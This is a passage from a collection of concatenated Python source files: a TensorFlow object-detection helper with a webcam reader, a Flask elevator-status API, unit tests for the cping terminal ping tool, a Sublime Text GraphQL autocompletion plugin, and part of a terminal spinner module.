'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
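# Example usage (illustrative; `frame` is an HxWx3 uint8 image array and
# `w`, `h` its dimensions):
#   graph, sess = load_inference_graph()
#   boxes, scores = detect_objects(frame, graph, sess)
#   draw_box_on_image(2, _score_thresh, scores, boxes, w, h, frame)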
# Actual detection .. generate scores and bounding boxes given an image
def gpu_detect_objects(image_np, detection_graph, sess):
gpus = tf.config.experimental.list_logical_devices('GPU')
if gpus:
for gpu in gpus:
# for gpu in ['/gpu:0', '/gpu:1']:
with tf.device(gpu.name):
# Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
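# Example usage (illustrative; assumes a camera at index 0):
#   stream = WebcamVideoStream(src=0, width=320, height=240).start()
#   frame = stream.read()
#   ...
#   stream.stop()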
|
api_pipes.py
|
from multiprocessing import Process, Pipe
from flask_socketio import SocketIO, emit
from flask import Flask, render_template
import time
import json
data = {
'local_elevator': {
'up': False,
'down': False,
'floor': '--'
},
'express_elevator': {
'up': False,
'down': False,
'floor': '--'
}
}
app = Flask(__name__)
app.config['SECRET_KEY'] = '5b6db414d4fd764a'
socketio = SocketIO(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/api')
def api():
global data
return json.dumps(data)
@app.route('/log')
def log():
return "This is where the log will be!"
@socketio.on('connected')
def connected():
global data
emit('data', json.dumps(data))
def run_server(app, host, port, debug):
socketio.run(app, host=host, port=port, debug=debug)
def main(child_pipe):
Process(target=run_server, args=(app, '0.0.0.0', 5000, True)).start()
while True:
print('Before!')
recv = child_pipe.recv()
print(recv)
parse_floors_str(recv[0], recv[1])
print(data)
print('After!')
def parse_floors_str(local_elevator, express_elevator):
global data
try:
local_elevator = local_elevator.replace(' ', '')
express_elevator = express_elevator.replace(' ', '')
if '+' in local_elevator:
data['local_elevator']['up'] = True
data['local_elevator']['down'] = False
data['local_elevator']['floor'] = local_elevator.replace('+', '')
elif '-' in local_elevator:
data['local_elevator']['up'] = False
data['local_elevator']['down'] = True
data['local_elevator']['floor'] = local_elevator.replace('-', '')
else:
data['local_elevator']['up'] = False
data['local_elevator']['down'] = False
data['local_elevator']['floor'] = local_elevator
if '+' in express_elevator:
data['express_elevator']['up'] = True
data['express_elevator']['down'] = False
data['express_elevator']['floor'] = express_elevator.replace(
'+', '')
elif '-' in express_elevator:
data['express_elevator']['up'] = False
data['express_elevator']['down'] = True
data['express_elevator']['floor'] = express_elevator.replace(
'-', '')
else:
data['express_elevator']['up'] = False
data['express_elevator']['down'] = False
data['express_elevator']['floor'] = express_elevator
except Exception:
    print('Error occurred in api_pipes.py!')
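# Example (illustrative): parse_floors_str('12+', ' 3-') marks the local
# elevator going up on floor '12' and the express elevator going down on
# floor '3'.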
if __name__ == "__main__":
main()
|
test_modern.py
|
'''cping.layouts.modern tests'''
# pylint: disable=not-an-iterable,unsubscriptable-object
import curses
import threading
import unittest
import unittest.mock
import cping.layouts.modern
import cping.protocols
# Regarding `list(window.mock_calls[x])[0][y]`: this is a workaround for pre-3.8
# Python, where `call.args` and `call.kwargs` are not available on mock calls.
class TestLayout(unittest.TestCase):
'''cping.layouts.modern.Layout tests.'''
@staticmethod
def wrap_curses_getch(keys):
'''Returns a callable that will return `keys` one at a time per call.
Once the keys are exhausted, 'q' is returned.'''
key_iterator = iter(keys)
def getch():
try:
return next(key_iterator)
except StopIteration:
return ord('q')
return getch
def setUp(self):
curses.init_pair = lambda *_: None
curses.color_pair = lambda x: x
def test___call__(self):
'''Confirm `__call__` calls `render`.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('1')
trigger = threading.Event()
layout.render = lambda x: x.set()
curses.wrapper = lambda x: x(trigger)
layout()
self.assertTrue(trigger.is_set())
def test_initialize_colors(self):
'''Confirm `initialize_colors` populates `Layout.colors`.'''
colors = ['green', 'red', 'yellow']
for color in colors:
self.assertIsNone(cping.layouts.modern.Layout.colors.get(color))
cping.layouts.modern.Layout.initialize_colors()
for color in colors:
self.assertIsNotNone(cping.layouts.modern.Layout.colors.get(color))
def test_render_sparkline(self):
'''`render_sparkline` should call `window.addstr`.'''
host = cping.protocols.Ping()('localhost')
host.add_result(-1)
host.add_result(0.1)
host.add_result(0.2, True)
host.add_result(-1)
window = unittest.mock.MagicMock()
cping.layouts.modern.Layout.render_sparkline(window, 1, 2, host, 3)
green = cping.layouts.modern.Layout.colors.get('green')
red = cping.layouts.modern.Layout.colors.get('red')
yellow = cping.layouts.modern.Layout.colors.get('yellow')
# The first result will not fit because of the length limit
self.assertEqual(len(window.mock_calls), 3)
self.assertEqual(list(window.mock_calls[0])[1][0], 1)
self.assertEqual(list(window.mock_calls[0])[1][1], 2)
self.assertEqual(list(window.mock_calls[0])[1][3], green)
self.assertEqual(list(window.mock_calls[1])[1][0], 1)
self.assertEqual(list(window.mock_calls[1])[1][1], 3)
self.assertEqual(list(window.mock_calls[1])[1][3], yellow)
self.assertEqual(list(window.mock_calls[2])[1][0], 1)
self.assertEqual(list(window.mock_calls[2])[1][1], 4)
self.assertEqual(list(window.mock_calls[2])[1][3], red)
def test_render_table(self):
'''`render_table` should call `window.erase`, `window.addnstr`, and
`window.refresh`.'''
host1 = cping.protocols.Ping()('host1')
host2 = cping.protocols.Ping()('host2')
table = cping.layouts.modern.get_table([host1, host2])
window = unittest.mock.MagicMock()
window.getmaxyx = lambda: (24, 80)
cping.layouts.modern.Layout.render_table(window, table, 0)
# Erase, 4x addnstr (header, 2x host, footer), refresh
self.assertEqual(len(window.mock_calls), 6)
# Erase at the beginning and refresh at the end
self.assertEqual(unittest.mock.call.erase(), window.mock_calls[0])
self.assertEqual(unittest.mock.call.refresh(), window.mock_calls[5])
# The table is ordered correctly
self.assertTrue(list(window.mock_calls[1])[1][2].startswith(' HOST'))
self.assertTrue(list(window.mock_calls[2])[1][2].startswith('host1'))
self.assertTrue(list(window.mock_calls[3])[1][2].startswith('host2'))
self.assertTrue(list(window.mock_calls[4])[1][2].startswith(' PAGE'))
# The header is selected
header_attributes = list(window.mock_calls[1])[1][4]
self.assertEqual(header_attributes & curses.A_BOLD, curses.A_BOLD)
def test_render_table_curses_error_handling(self):
'''`render_table` should handle exceptions of `curses.error`.'''
def curses_error():
raise curses.error()
window = unittest.mock.MagicMock()
window.erase = curses_error
window.getmaxyx = lambda: (24, 80)
cping.layouts.modern.Layout.render_table(window, [], 0)
# The error canceled the rendering before any calls were made
self.assertEqual(len(window.mock_calls), 0)
def test_render(self):
'''Ensure `render` sets the timeout of the window and clears the input
buffers after `window.getch`.'''
def getch():
getch_trigger.wait()
return ord('q')
flushinp_trigger = threading.Event()
getch_trigger = threading.Event()
window = unittest.mock.MagicMock()
window.getch = getch
window.getmaxyx = lambda: (24, 80)
curses.flushinp = flushinp_trigger.set
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
renderer = threading.Thread(target=layout.render, args=(window, ))
renderer.start()
# Input buffers are flushed after `window.getch`
self.assertFalse(flushinp_trigger.is_set())
getch_trigger.set()
self.assertTrue(flushinp_trigger.wait(0.5))
# Wait for the 'q' key to get processed once `getch_trigger` is set
renderer.join()
# Window timeout is set to the protocol interval
interval = layout.protocol.interval * 1000
self.assertIn(unittest.mock.call.timeout(interval), window.mock_calls)
def test_render_function_burst_mode(self):
'''Enable/disable burst mode on a single host.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.burst_mode.set = unittest.mock.MagicMock()
host.burst_mode.clear = unittest.mock.MagicMock()
keys = [curses.KEY_DOWN, ord('b')]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# Both hosts are cleared, but only host1 would've been set
self.assertTrue(layout.hosts[0].burst_mode.set.called)
self.assertFalse(layout.hosts[1].burst_mode.set.called)
self.assertTrue(layout.hosts[0].burst_mode.clear.called)
self.assertTrue(layout.hosts[1].burst_mode.clear.called)
def test_render_function_burst_mode_all(self):
'''Enable/disable burst mode on all hosts.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.burst_mode.set = unittest.mock.MagicMock()
host.burst_mode.clear = unittest.mock.MagicMock()
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch([])
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# If no function matched, the default will clear burst mode
for host in layout.hosts:
self.assertTrue(host.burst_mode.clear.called)
host.burst_mode.clear.reset_mock()
self.assertFalse(host.burst_mode.clear.called)
window.getch = TestLayout.wrap_curses_getch([ord('b')])
layout.render(window)
# Burst mode will be cleared at the end
for host in layout.hosts:
self.assertTrue(host.burst_mode.set.called)
self.assertTrue(host.burst_mode.clear.called)
def test_render_function_change_selection(self):
'''Ensure the selection changes but doesn't go out of the table bounds.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('1')
keys = [curses.KEY_DOWN, curses.KEY_DOWN, curses.KEY_UP, curses.KEY_UP]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
function = 'cping.layouts.modern.Layout.render_table'
with unittest.mock.patch(function) as mock:
layout.render(window)
# Startup table render (selection at 0). Key down twice, selection
# at 1; reached bottom. Key up twice, selection at 0; reached top
for call, selection in zip(mock.call_args_list, [0, 1, 1, 0, 0]):
self.assertEqual(list(call)[0][2], selection)
def test_render_function_sort(self):
'''Ensure accepted sort keys are between 0 and 6.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
keys = [ord(str(x)) for x in range(8)]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
window.getmaxyx = lambda: (24, 80)
function = 'cping.layouts.modern.get_table_sort_key'
with unittest.mock.patch(function) as mock:
mock.return_value = 1
layout.render(window)
# 0 to 6 are accepted, 7 is ignored
self.assertEqual(len(mock.call_args_list), 7)
for call, sort_key in zip(mock.call_args_list, range(7)):
self.assertEqual(list(call)[0][0], sort_key)
def test_render_function_start_stop(self):
'''Start/stop a single host.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.start = unittest.mock.MagicMock()
host.stop = unittest.mock.MagicMock()
keys = [curses.KEY_DOWN, ord('s')]
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch(keys)
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# Only host1 should be started
self.assertTrue(layout.hosts[0].start.called)
self.assertFalse(layout.hosts[1].start.called)
# Mark the hosts as running
for host in layout.hosts:
host.is_running = unittest.mock.MagicMock(return_value=True)
window.getch = TestLayout.wrap_curses_getch(keys)
layout.render(window)
# Only host1 should be stopped
self.assertTrue(layout.hosts[0].stop.called)
self.assertFalse(layout.hosts[1].stop.called)
def test_render_function_start_stop_all(self):
'''Start/stop all hosts.'''
layout = cping.layouts.modern.Layout(cping.protocols.Ping())
layout.add_host('host1')
layout.add_host('host2')
for host in layout.hosts:
host.start = unittest.mock.MagicMock()
host.stop = unittest.mock.MagicMock()
window = unittest.mock.MagicMock()
window.getch = TestLayout.wrap_curses_getch([ord('s')])
window.getmaxyx = lambda: (24, 80)
layout.render(window)
# Hosts were not running; should be started
for host in layout.hosts:
self.assertTrue(host.start.called)
# Mark the hosts as running
for host in layout.hosts:
host.is_running = unittest.mock.MagicMock(return_value=True)
window.getch = TestLayout.wrap_curses_getch([ord('s')])
layout.render(window)
# Hosts were running; should be stopped
for host in layout.hosts:
self.assertTrue(host.stop.called)
class TestGetHostColumns(unittest.TestCase):
'''cping.layouts.modern.get_host_columns tests.'''
def test_no_results(self):
'''A host with no results should return place-holders in the stats.'''
host = cping.protocols.Ping()('hi')
columns = cping.layouts.modern.get_host_columns(host)
expected = ['hi'] + (['- '] * 5)
self.assertEqual(columns, expected)
def test_results(self):
'''Stats should have 2 decimal places, or a percentage for `loss`.'''
host = cping.protocols.Ping()('hi')
host.add_result(-1)
host.add_result(0.1)
host.add_result(0.2)
host.add_result(0.3)
columns = cping.layouts.modern.get_host_columns(host)
expected = ['hi', '100.00', '200.00', '300.00', '100.00', '25% ']
self.assertEqual(columns, expected)
class TestGetTablePage(unittest.TestCase):
'''cping.layouts.modern.get_table_page tests.'''
def test_single_page(self):
'''A page size that shows the entire table.'''
table = list(range(10))
size = 10
selection = 5
page = cping.layouts.modern.get_table_page(table, size, selection)
self.assertEqual(page, table)
def test_multiple_page(self):
'''A size smaller than the table length should paginate.'''
table = list(range(10))
size = 3
selection = 5
page = cping.layouts.modern.get_table_page(table, size, selection)
self.assertEqual(page, table[3:6])
class TestGetTable(unittest.TestCase):
'''cping.layouts.modern.get_table tests.'''
def test_column_width(self):
'''The columns should all have equal lengths among the rows.'''
hosts = [cping.protocols.Ping()(str(x)) for x in range(3)]
table = cping.layouts.modern.get_table(hosts)
hosts[0].add_result(1000)
for index, column in enumerate(table[0]['columns']):
column_width = len(column)
for row in table:
self.assertEqual(len(row['columns'][index]), column_width)
def test_header(self):
'''Confirm the table starts with the header.'''
hosts = [cping.protocols.Ping()(str(x)) for x in range(3)]
table = cping.layouts.modern.get_table(hosts)
header = ['HOST', 'MIN', 'AVG', 'MAX', 'STD', 'LOSS']
self.assertEqual(len(table), len(hosts) + 1)
self.assertEqual(table[0]['line'].split(), header)
def test_host_running(self):
'''A running host should have different attributes than a stopped one.'''
host1 = cping.protocols.Ping()('1')
host2 = cping.protocols.Ping()('2')
trigger = threading.Event()
host1.protocol.ping_loop = lambda _: trigger.wait()
host1.start()
table = cping.layouts.modern.get_table([host1, host2])
trigger.set()
self.assertNotEqual(table[1]['attrs'], table[2]['attrs'])
def test_host_status(self):
'''Host status should be included in the table.'''
host = cping.protocols.Ping()('1')
host.status = 'Some status'
table = cping.layouts.modern.get_table([host])
self.assertIn(host.status, table[1]['line'])
class TestGetTableSortKey(unittest.TestCase):
'''cping.layouts.modern.get_table_sort_key tests.'''
def test_cycle(self):
'''Sorting key should cycle between asc->desc->none->asc->...'''
self.assertEqual(cping.layouts.modern.get_table_sort_key(1, None), 1)
self.assertEqual(cping.layouts.modern.get_table_sort_key(1, 1), -1)
self.assertEqual(cping.layouts.modern.get_table_sort_key(1, -1), 0)
def test_different_leads_to_ascending(self):
'''Different sorting key than current leads to ascending of the new key.'''
self.assertEqual(cping.layouts.modern.get_table_sort_key(2, 1), 2)
self.assertEqual(cping.layouts.modern.get_table_sort_key(2, -1), 2)
class TestSortHosts(unittest.TestCase):
'''cping.layouts.modern.sort_hosts tests.'''
def setUp(self):
# min=1000, avg=2000, max=3000, stdev=1000, loss=0.0
self.host1 = cping.protocols.Ping()('host1')
self.host1.add_result(1)
self.host1.add_result(2)
self.host1.add_result(3)
# min=3000, avg=3500, max=4000, stdev=707.10, loss=0.33
self.host2 = cping.protocols.Ping()('host22')
self.host2.add_result(3)
self.host2.add_result(4)
self.host2.add_result(-1)
# min=500, avg=700, max=900, stdev=200, loss=0.25
self.host3 = cping.protocols.Ping()('host3')
self.host3.add_result(0.5)
self.host3.add_result(0.7)
self.host3.add_result(0.9)
self.host3.add_result(-1)
def test_no_results(self):
'''Sorting with a host that has no results.'''
empty_host = cping.protocols.Ping()('host3')
hosts = [self.host1, empty_host, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 2)
self.assertEqual(sorted_hosts, [self.host1, self.host2, empty_host])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -2)
self.assertEqual(sorted_hosts, [empty_host, self.host2, self.host1])
def test_no_sorting(self):
'''Sorting key 0, or an invalid key, will not change the order.'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 0)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, None)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 7)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
def test_sorting_host(self):
'''Sorting key 1 will sort by str(host).'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 1)
self.assertEqual(sorted_hosts, [self.host1, self.host3, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -1)
self.assertEqual(sorted_hosts, [self.host2, self.host3, self.host1])
def test_sorting_min(self):
'''Sorting key 2 will sort by the minimum statistic.'''
hosts = [self.host1, self.host2, self.host3]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 2)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -2)
self.assertEqual(sorted_hosts, [self.host2, self.host1, self.host3])
def test_sorting_max(self):
'''Sorting key 3 will sort by the maximum statistic.'''
hosts = [self.host1, self.host2, self.host3]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 3)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -3)
self.assertEqual(sorted_hosts, [self.host2, self.host1, self.host3])
def test_sorting_avg(self):
'''Sorting key 4 will sort by the average statistic.'''
hosts = [self.host1, self.host2, self.host3]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 4)
self.assertEqual(sorted_hosts, [self.host3, self.host1, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -4)
self.assertEqual(sorted_hosts, [self.host2, self.host1, self.host3])
def test_sorting_stdev(self):
'''Sorting key 5 will sort by the standard deviation statistic.'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 5)
self.assertEqual(sorted_hosts, [self.host3, self.host2, self.host1])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -5)
self.assertEqual(sorted_hosts, [self.host1, self.host2, self.host3])
def test_sorting_loss(self):
'''Sorting key 6 will sort by the packet loss statistic.'''
hosts = [self.host3, self.host1, self.host2]
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, 6)
self.assertEqual(sorted_hosts, [self.host1, self.host3, self.host2])
sorted_hosts = cping.layouts.modern.sort_hosts(hosts, -6)
self.assertEqual(sorted_hosts, [self.host2, self.host3, self.host1])
|
graphql.py
|
import sublime
import sublime_plugin
import re
import sys
import traceback
from threading import Thread
from ..deps import requests
from ..deps.graphql.parser import GraphQLParser
from ..deps.graphql.lexer import GraphQLLexer
from ..core import RequestCommandMixin
from ..core.parsers import parse_requests
from ..core.responses import prepare_request
placeholder = '__introspection_placeholder'
introspection_query = """
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
}
}
fragment InputValue on __InputValue {
name
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
"""
def set_graphql_schema_on_view(view, req):
"""If request was to a GraphQL endpoint, send introspection query on a separate
thread, parse response and set it on view.
"""
if not req.skwargs.get('gql'):
return
def _set(view, url):
"""Ensure types and fields within types can be looked up quickly by name.
`types` dict has the following format:
typeName -> typeDict
Within `typeDict`, `fields` dict has similar format:
fieldName -> fieldDict
"""
kwargs = dict(req.kwargs)
kwargs.pop('params', None)
kwargs.pop('json', None)
kwargs['timeout'] = 3
try:
response = requests.get(url, params={'query': introspection_query}, **kwargs)
schema = response.json()['data']['__schema'] # get root `Query` type
query_type = schema['queryType']['name']
except Exception:
response = requests.post(url, json={'query': introspection_query}, **kwargs)
schema = response.json()['data']['__schema'] # get root `Query` type
query_type = schema['queryType']['name']
types = {}
for t in schema['types']:
types[t['name']] = t
fields = {f['name']: f for f in (t['fields'] or [])}
t['fields'] = fields
view.settings().set('requester.gql_schema', (query_type, types))
thread = Thread(target=lambda: _set(view, req.url.split('?')[0]))
thread.start()
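# Illustrative shape of the stored setting (derived from `_set` above): a
# `(query_type_name, types)` pair such as
#     ('Query', {'Query': {..., 'fields': {'user': {...}, ...}}, ...})
# where each type's 'fields' dict has been re-keyed by field name so the
# completion code can do O(1) lookups.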
class RequesterGqlAutocompleteListener(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
"""Runs on all views, but is NOOP unless view is response view or history
view. Inside gql query string, only completions returned by this method
are shown.
"""
response_view = view.settings().get('requester.response_view', False)
history_view = view.settings().get('requester.history_view', False)
if not response_view and not history_view:
return None
content = view.substr(sublime.Region(0, view.size()))
m = re.search(r'\bgql\s*=\s*("|\')+', content)
if m is None:
return None
offset, idx = m.end(), view.sel()[0].begin()
try:
request = parse_requests(content, n=1)[0]
if getattr(view, '_env', None) is None:
view._env = RequestCommandMixin.get_env_dict_from_string(
view.settings().get('requester.env_string', None)
)
req = prepare_request(request, view._env, 1)
schema = view.settings().get('requester.gql_schema', None)
if not schema: # let user know schema is being retrieved
set_graphql_schema_on_view(view, req)
raise Exception('Loading GraphQL schema info')
gql = req.skwargs['gql']
completions = get_completions(gql, idx-offset, schema)
return completions
except Exception as e:
print('GraphQL Error:')
traceback.print_exc(file=sys.stdout)
return (
[[str(e), ' '], ['...', ' ']],
sublime.INHIBIT_WORD_COMPLETIONS | sublime.INHIBIT_EXPLICIT_COMPLETIONS
)
def get_completions(gql, idx, schema):
"""Creates AST from `gql` query string, finds out exactly where cursor is in
string, and uses `schema` to get appropriate completions. Doesn't protect
against exceptions. They should be handled by calling code.
"""
start, end = slurp_word(gql, idx)
gql_parser = GraphQLParser()
ast = gql_parser.parse(gql[:start] + placeholder + gql[end:], lexer=GraphQLLexer())
for query in ast.definitions: # get path if it exists
path = placeholder_path(query, placeholder)
if path is not None:
break
query_type, types = schema
t = resolve_type(path, types, query_type)
fields = types[t]['fields']
completions = []
for f in fields.values():
name = f['name']
args = [a['name'] + ':' for a in f['args']]
args_string = '({})'.format(', '.join(args)) if args else ''
type_name = resolve_field_type(f)
completions.append([
'{}{}\t{}'.format(name, args_string, type_name),
'{}{}'.format(name, args_string),
])
return (
completions,
sublime.INHIBIT_WORD_COMPLETIONS | sublime.INHIBIT_EXPLICIT_COMPLETIONS
)
def resolve_type(path, types, query_type):
"""Moves back and forth between field names in `path` and GraphQL types to
find type name of leaf node in path.
"""
t = query_type
for f in path[:-1]: # stop before reaching placeholder
field = types[t]['fields'][f]
t = resolve_field_type(field)
return t
def resolve_field_type(field):
"""Keep digging into field type until finding a non-null `name`.
"""
type_ = field['type']
while type_ is not None and type_['name'] is None:
type_ = type_.get('ofType')
return type_['name'] if type_ is not None else None
def placeholder_path(field, placeholder):
"""Not the most elegant implementation of DFS. It searches the whole tree and
keeps track of the path to each node. If it finds `placeholder`, it saves this
path and returns it after search is finished.
"""
path = None
def get_path(selection, placeholder, seen=tuple()):
for sel in selection.selections:
seen_next = seen + (sel.name,)
if sel.name == placeholder:
nonlocal path
path = seen_next
get_path(sel, placeholder, seen_next)
get_path(field, placeholder)
return path
def slurp_word(s, idx):
"""Returns index boundaries of word adjacent to `idx` in `s`.
"""
alnum = r'[A-Za-z0-9_]'
start, end = idx, idx
while True:
if re.match(alnum, s[start-1]):
start -= 1
else:
break
end = idx
while True:
if re.match(alnum, s[end]):
end += 1
else:
break
return start, end
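# Illustrative: with s = "query { user }" and the cursor at idx 10 (inside
# the word "user"), slurp_word(s, 10) returns (8, 12) and s[8:12] == 'user',
# the span the completion placeholder is substituted into.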
|
spin.py
|
# -*- coding=utf-8 -*-
import functools
import os
import signal
import sys
import threading
import time
import colorama
import cursor
import six
from .compat import to_native_string
from .termcolors import COLOR_MAP, COLORS, colored, DISABLE_COLORS
from io import StringIO
try:
import yaspin
except ImportError:
yaspin = None
Spinners = None
else:
from yaspin.spinners import Spinners
handler = None
if yaspin and os.name == "nt":
handler = yaspin.signal_handlers.default_handler
elif yaspin and os.name != "nt":
handler = yaspin.signal_handlers.fancy_handler
CLEAR_LINE = chr(27) + "[K"
class DummySpinner(object):
def __init__(self, text="", **kwargs):
super(DummySpinner, self).__init__()
if DISABLE_COLORS:
colorama.init()
from .misc import decode_for_output
self.text = to_native_string(decode_for_output(text)) if text else ""
self.stdout = kwargs.get("stdout", sys.stdout)
self.stderr = kwargs.get("stderr", sys.stderr)
self.out_buff = StringIO()
self.write_to_stdout = kwargs.get("write_to_stdout", False)
def __enter__(self):
if self.text and self.text != "None":
if self.write_to_stdout:
self.write(self.text)
return self
def __exit__(self, exc_type, exc_val, tb):
if exc_type:
# the third parameter is named `tb` so it does not shadow the
# traceback module imported below
import traceback
from .misc import decode_for_output
self.write_err(decode_for_output("".join(traceback.format_exception(exc_type, exc_val, tb))))
self._close_output_buffer()
return False
def __getattr__(self, k):
try:
retval = super(DummySpinner, self).__getattribute__(k)
except AttributeError:
if k in COLOR_MAP.keys() or k.upper() in COLORS:
return self
raise
else:
return retval
def _close_output_buffer(self):
if self.out_buff and not self.out_buff.closed:
try:
self.out_buff.close()
except Exception:
pass
def fail(self, exitcode=1, text="FAIL"):
from .misc import decode_for_output
if text and text != "None":
if self.write_to_stdout:
self.write(decode_for_output(text))
else:
self.write_err(decode_for_output(text))
self._close_output_buffer()
def ok(self, text="OK"):
if text and text != "None":
if self.write_to_stdout:
self.stdout.write(self.text)
else:
self.stderr.write(self.text)
self._close_output_buffer()
return 0
def hide_and_write(self, text, target=None):
if not target:
target = self.stdout
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
return
target.write(decode_for_output("\r"))
self._hide_cursor(target=target)
target.write(decode_for_output("{0}\n".format(text)))
target.write(CLEAR_LINE)
self._show_cursor(target=target)
def write(self, text=None):
if not self.write_to_stdout:
return self.write_err(text)
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
return
text = decode_for_output(text)
self.stdout.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stdout.write(line)
self.stdout.write(CLEAR_LINE)
def write_err(self, text=None):
from .misc import decode_for_output
if text is None or isinstance(text, six.string_types) and text == "None":
return
text = decode_for_output(text)
self.stderr.write(decode_for_output("\r"))
line = decode_for_output("{0}\n".format(text))
self.stderr.write(line)
self.stderr.write(CLEAR_LINE)
@staticmethod
def _hide_cursor(target=None):
pass
@staticmethod
def _show_cursor(target=None):
pass
base_obj = yaspin.core.Yaspin if yaspin is not None else DummySpinner
class VistirSpinner(base_obj):
"A spinner class for handling spinners on windows and posix."
def __init__(self, *args, **kwargs):
"""
Get a spinner object or a dummy spinner to wrap a context.
Keyword Arguments:
:param str spinner_name: A spinner type e.g. "dots" or "bouncingBar" (default: {"bouncingBar"})
:param str start_text: Text to start off the spinner with (default: {None})
:param dict handler_map: Handler map for signals to be handled gracefully (default: {None})
:param bool nospin: If true, use the dummy spinner (default: {False})
:param bool write_to_stdout: Writes to stdout if true, otherwise writes to stderr (default: True)
"""
self.handler = handler
colorama.init()
sigmap = {}
if handler:
sigmap.update({
signal.SIGINT: handler,
signal.SIGTERM: handler
})
handler_map = kwargs.pop("handler_map", {})
if os.name == "nt":
sigmap[signal.SIGBREAK] = handler
else:
sigmap[signal.SIGALRM] = handler
if handler_map:
sigmap.update(handler_map)
spinner_name = kwargs.pop("spinner_name", "bouncingBar")
start_text = kwargs.pop("start_text", None)
_text = kwargs.pop("text", "Running...")
kwargs["text"] = start_text if start_text is not None else _text
kwargs["sigmap"] = sigmap
kwargs["spinner"] = getattr(Spinners, spinner_name, "")
write_to_stdout = kwargs.pop("write_to_stdout", True)
self.stdout = kwargs.pop("stdout", sys.stdout)
self.stderr = kwargs.pop("stderr", sys.stderr)
self.out_buff = StringIO()
